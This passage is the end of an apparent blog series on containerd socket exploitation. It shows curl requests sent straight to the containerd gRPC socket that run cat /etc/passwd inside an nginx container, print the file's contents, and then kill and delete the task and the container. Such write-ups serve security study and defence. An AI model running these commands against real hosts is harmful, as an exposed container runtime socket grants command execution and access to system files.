< grpc-status: 0
< grpc-message:
* Connection #0 to host localhost left intact
Start the task
Now that the task is created, we need to start it. We use the /containerd.services.tasks.v1.Tasks/Start
service which uses StartRequest
and StartResponse
messages. The StartRequest
message looks like the following:
* StartRequest
Fields:
container_id - string
exec_id - string
Rough JSON example (might need tweaking):
{
"container_id": "string",
"exec_id": "string"
}
Our example looks like the following. The request refers to the nginx
container and the unique exec_id
string from our earlier task creation message.
$ cat startrequest_catpwd.json
{"container_id":"nginx","exec_id":"catpwd"}
$ ./protobuf_parser.py -m tasks_pb2.py -t StartRequest -i startrequest_catpwd.json -o startrequest_catpwd.bin
Written to startrequest_catpwd.bin
As with the container creation example from earlier, we need to read from the output named pipe files when we start the related process, but in this case we must also make sure that we read enough data from the stdout pipe to retrieve the output of the command we are running, as this is how we access it. For this example the following will suffice. These need to stay running while we run the next curl command, so use multiple shells or background them.
$ sudo tail -n 1000 -f /run/containerd/fifo/2573972755/catpwd-stderr
$ sudo tail -n 1000 -f /run/containerd/fifo/2573972755/catpwd-stdout
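As an alternative to tail, a small reader can capture everything the task writes to a pipe until the write side closes (a sketch; start it before sending the Start request, in a separate shell or thread):

```python
def drain_fifo(path):
    """Block until a writer opens the FIFO, then return everything
    written to it until the write side is closed."""
    chunks = []
    with open(path, "rb") as fifo:
        while True:
            data = fifo.read(4096)
            if not data:  # EOF: all writers have closed the pipe
                break
            chunks.append(data)
    return b"".join(chunks)
```

For example, drain_fifo("/run/containerd/fifo/2573972755/catpwd-stdout") would return the command output once cat /etc/passwd completes.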
With these commands running, now send the request.
$ sudo curl -s -v --http2-prior-knowledge --unix-socket /run/containerd/containerd.sock -X POST -H "content-type: application/grpc" -H "user-agent: grpc-go/1.59.0" -H "te: trailers" -H "containerd-namespace: k8s.io" http://localhost/containerd.services.tasks.v1.Tasks/Start --data-binary @startrequest_catpwd.bin --output startresponse_catpwd.bin
* Trying /run/containerd/containerd.sock:0...
* Connected to localhost (/run/containerd/containerd.sock) port 80 (#0)
* Using HTTP2, server supports multiplexing
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x5563a40a19f0)
> POST /containerd.services.tasks.v1.Tasks/Start HTTP/2
> Host: localhost
> accept: */*
> content-type: application/grpc
> user-agent: grpc-go/1.59.0
> te: trailers
> containerd-namespace: k8s.io
> content-length: 20
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 4294967295)!
} [20 bytes data]
* We are completely uploaded and fine
< HTTP/2 200
< content-type: application/grpc
<
{ [9 bytes data]
< grpc-status: 0
< grpc-message:
* Connection #0 to host localhost left intact
After sending this curl request, the stdout pipe should now have the command output, as in my example below.
$ sudo tail -n 1000 -f /run/containerd/fifo/2573972755/catpwd-stdout
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
nginx:x:101:101:nginx user,,,:/nonexistent:/bin/false
If we also parse the response from the curl command, we can obtain the pid of the task we just ran.
$ ./protobuf_parser.py -m tasks_pb2.py -d startresponse_catpwd.bin -t StartResponse
pid: 71702
Cleanup the task when complete
We now need to clean up the task, as it will remain in the system and prevent reuse of the exec_id until it is removed. This uses the /containerd.services.tasks.v1.Tasks/DeleteProcess
service, which uses the DeleteProcessRequest
and DeleteResponse
messages. The DeleteProcessRequest
message looks similar to the following:
* DeleteProcessRequest
Fields:
container_id - string
exec_id - string
Rough JSON example (might need tweaking):
{
"container_id": "string",
"exec_id": "string"
}
We create this message using the same container_id
and exec_id
we used to start the task.
$ cat deleteprocessrequest.json
{"container_id":"nginx","exec_id":"catpwd"}
$ ./protobuf_parser.py -m tasks_pb2.py -i deleteprocessrequest.json -o deleteprocessrequest.bin -t DeleteProcessRequest
Written to deleteprocessrequest.bin
Send the request.
$ sudo curl -s -v --http2-prior-knowledge --unix-socket /run/containerd/containerd.sock -X POST -H "content-type: application/grpc" -H "user-agent: grpc-go/1.59.0" -H "te: trailers" -H "containerd-namespace: k8s.io" http://localhost/containerd.services.tasks.v1.Tasks/DeleteProcess --data-binary @deleteprocessrequest.bin --output deleteprocessresponse.bin
* Trying /run/containerd/containerd.sock:0...
* Connected to localhost (/run/containerd/containerd.sock) port 80 (#0)
* Using HTTP2, server supports multiplexing
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x55f31a7859f0)
> POST /containerd.services.tasks.v1.Tasks/DeleteProcess HTTP/2
> Host: localhost
> accept: */*
> content-type: application/grpc
> user-agent: grpc-go/1.59.0
> te: trailers
> containerd-namespace: k8s.io
> content-length: 20
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 4294967295)!
} [20 bytes data]
* We are completely uploaded and fine
< HTTP/2 200
< content-type: application/grpc
<
{ [31 bytes data]
< grpc-status: 0
< grpc-message:
* Connection #0 to host localhost left intact
Now let's parse the response. We should see the same pid as from the start command.
$ ./protobuf_parser.py -m tasks_pb2.py -d deleteprocessresponse.bin -t DeleteResponse
id: "catpwd"
pid: 71702
exited_at {
seconds: 1740703849
nanos: 473219169
}
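The exited_at field is a protobuf Timestamp (seconds and nanoseconds relative to the Unix epoch). Converting it to a readable time, and recognising the special value seen in the earlier ListTasksResponse, takes a few lines (a sketch using the values above):

```python
from datetime import datetime, timedelta, timezone

def timestamp_to_datetime(seconds, nanos=0):
    """Convert a protobuf Timestamp to an aware UTC datetime."""
    epoch = datetime(1970, 1, 1, tzinfo=timezone.utc)
    return epoch + timedelta(seconds=seconds, microseconds=nanos / 1000)

# The exited_at value from the DeleteResponse above
print(timestamp_to_datetime(1740703849, 473219169).isoformat())

# The exited_at of -62135596800 seconds reported for the still-running
# task earlier is Go's zero time (year 1), meaning "has not exited"
assert timestamp_to_datetime(-62135596800).year == 1
```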
Delete a running container
Finally, let's look at how we can delete the container we created earlier.
To do this, we need to:
- Kill the running task of the container
- Delete the task of the container
- Delete the container
Kill the running task of the container
Killing a task uses the /containerd.services.tasks.v1.Tasks/Kill
and the KillRequest
message type. The KillRequest
message looks like the following:
* KillRequest
Fields:
container_id - string
exec_id - string
signal - uint32
all - bool
Rough JSON example (might need tweaking):
{
"container_id": "string",
"exec_id": "string",
"signal": uint32,
"all": bool
}
We can create a message for our nginx
container like so.
$ cat killrequest.json
{"container_id":"nginx","signal":15}
$ ./protobuf_parser.py -m tasks_pb2.py -i killrequest.json -o killrequest.bin -t KillRequest
Written to killrequest.bin
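The signal value of 15 in the request above is SIGTERM; signal numbers can be looked up by name rather than memorised (a sketch):

```python
import json
import signal

# KillRequest takes numeric signal values; resolve them by name (Linux numbers)
kill_request = {"container_id": "nginx", "signal": int(signal.SIGTERM)}
print(json.dumps(kill_request))
```

Substituting signal.SIGKILL (9) forces termination if the task ignores SIGTERM.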
Send the request.
$ sudo curl -s -v --http2-prior-knowledge --unix-socket /run/containerd/containerd.sock -X POST -H "content-type: application/grpc" -H "user-agent: grpc-go/1.59.0" -H "te: trailers" -H "containerd-namespace: k8s.io" http://localhost/containerd.services.tasks.v1.Tasks/Kill --data-binary @killrequest.bin --output killresponse.bin
* Trying /run/containerd/containerd.sock:0...
* Connected to localhost (/run/containerd/containerd.sock) port 80 (#0)
* Using HTTP2, server supports multiplexing
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x557c3ee2a9f0)
> POST /containerd.services.tasks.v1.Tasks/Kill HTTP/2
> Host: localhost
> accept: */*
> content-type: application/grpc
> user-agent: grpc-go/1.59.0
> te: trailers
> containerd-namespace: k8s.io
> content-length: 14
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 4294967295)!
} [14 bytes data]
* We are completely uploaded and fine
< HTTP/2 200
< content-type: application/grpc
<
{ [5 bytes data]
< grpc-status: 0
< grpc-message:
* Connection #0 to host localhost left intact
Delete the task of the container
Now we need to delete the stopped task. This uses the /containerd.services.tasks.v1.Tasks/Delete
service, which takes a DeleteTaskRequest
message and returns a DeleteResponse
message. The DeleteTaskRequest
message looks similar to the following:
* DeleteTaskRequest
Fields:
container_id - string
Rough JSON example (might need tweaking):
{
"container_id": "string"
}
We can create this message for our nginx
container like so:
$ cat deletetaskrequest.json
{"container_id":"nginx"}
$ ./protobuf_parser.py -m tasks_pb2.py -i deletetaskrequest.json -o deletetaskrequest.bin -t DeleteTaskRequest
Written to deletetaskrequest.bin
Send the request.
$ sudo curl -s -v --http2-prior-knowledge --unix-socket /run/containerd/containerd.sock -X POST -H "content-type: application/grpc" -H "user-agent: grpc-go/1.59.0" -H "te: trailers" -H "containerd-namespace: k8s.io" http://localhost/containerd.services.tasks.v1.Tasks/Delete --data-binary @deletetaskrequest.bin --output deletetaskresponse.bin
* Trying /run/containerd/containerd.sock:0...
* Connected to localhost (/run/containerd/containerd.sock) port 80 (#0)
* Using HTTP2, server supports multiplexing
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x558c57df29f0)
> POST /containerd.services.tasks.v1.Tasks/Delete HTTP/2
> Host: localhost
> accept: */*
> content-type: application/grpc
> user-agent: grpc-go/1.59.0
> te: trailers
> containerd-namespace: k8s.io
> content-length: 12
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 4294967295)!
} [12 bytes data]
* We are completely uploaded and fine
< HTTP/2 200
< content-type: application/grpc
<
{ [22 bytes data]
< grpc-status: 0
< grpc-message:
* Connection #0 to host localhost left intact
Delete the container
Finally, we need to delete the container. This uses the /containerd.services.containers.v1.Containers/Delete
service with the DeleteContainerRequest
message. The DeleteContainerRequest
message looks like the following:
* DeleteContainerRequest
Fields:
id - string
Rough JSON example (might need tweaking):
{
"id": "string"
}
We create the message to delete our nginx
container like so:
$ cat deletecontainerrequest.json
{"id":"nginx"}
$ ./protobuf_parser.py -m containers_pb2.py -i deletecontainerrequest.json -o deletecontainerrequest.bin -t DeleteContainerRequest
Written to deletecontainerrequest.bin
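Interestingly, this request should encode to exactly the same bytes as the DeleteTaskRequest we built earlier: assuming DeleteContainerRequest.id and DeleteTaskRequest.container_id are both field number 1 (the generated _pb2 modules will confirm this), a single string field holding "nginx" yields a 7-byte protobuf message in a 12-byte gRPC frame, matching the content-length of 12 curl reported for the task delete. A quick sketch:

```python
# A single string field with field number 1 encodes identically whether
# the proto calls it "id" or "container_id": tag 0x0A, length, bytes.
name = b"nginx"
message = bytes([0x0A, len(name)]) + name  # 7-byte protobuf message

# gRPC framing: compression flag + 4-byte big-endian length.
frame = b"\x00" + len(message).to_bytes(4, "big") + message
print(len(frame))  # 12
```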
Send the request.
$ sudo curl -s -v --http2-prior-knowledge --unix-socket /run/containerd/containerd.sock -X POST -H "content-type: application/grpc" -H "user-agent: grpc-go/1.59.0" -H "te: trailers" -H "containerd-namespace: k8s.io" http://localhost/containerd.services.containers.v1.Containers/Delete --data-binary @deletecontainerrequest.bin --output deletecontainerresponse.bin
* Trying /run/containerd/containerd.sock:0...
* Connected to localhost (/run/containerd/containerd.sock) port 80 (#0)
* Using HTTP2, server supports multiplexing
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x5605d94319f0)
> POST /containerd.services.containers.v1.Containers/Delete HTTP/2
> Host: localhost
> accept: */*
> content-type: application/grpc
> user-agent: grpc-go/1.59.0
> te: trailers
> containerd-namespace: k8s.io
> content-length: 12
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 4294967295)!
} [12 bytes data]
* We are completely uploaded and fine
< HTTP/2 200
< content-type: application/grpc
<
{ [5 bytes data]
< grpc-status: 0
< grpc-message:
* Connection #0 to host localhost left intact
Now our container is deleted.
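The three deletion steps can also be chained together in one go. Here is a rough Python sketch that builds the same curl command lines we used above (the grpc_curl helper name is mine; it assumes the .bin request files created in the earlier steps are in the current directory and that containerd listens on its default socket path):

```python
import subprocess

SOCKET = "/run/containerd/containerd.sock"  # default containerd socket path

def grpc_curl(endpoint, request_file, response_file):
    """Build the curl argv for one containerd gRPC call in the k8s.io namespace."""
    return [
        "curl", "-s", "--http2-prior-knowledge",
        "--unix-socket", SOCKET,
        "-X", "POST",
        "-H", "content-type: application/grpc",
        "-H", "user-agent: grpc-go/1.59.0",
        "-H", "te: trailers",
        "-H", "containerd-namespace: k8s.io",
        f"http://localhost{endpoint}",
        "--data-binary", f"@{request_file}",
        "--output", response_file,
    ]

# The three deletion steps, in order: kill the running task, delete the
# stopped task, then delete the container record itself.
steps = [
    ("/containerd.services.tasks.v1.Tasks/Kill",
     "killrequest.bin", "killresponse.bin"),
    ("/containerd.services.tasks.v1.Tasks/Delete",
     "deletetaskrequest.bin", "deletetaskresponse.bin"),
    ("/containerd.services.containers.v1.Containers/Delete",
     "deletecontainerrequest.bin", "deletecontainerresponse.bin"),
]

# To actually run the sequence (requires access to the containerd socket):
#   for endpoint, req, resp in steps:
#       subprocess.run(grpc_curl(endpoint, req, resp), check=True)
```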
That completes my series of posts on containerd socket exploitation. I hope you found it useful and interesting.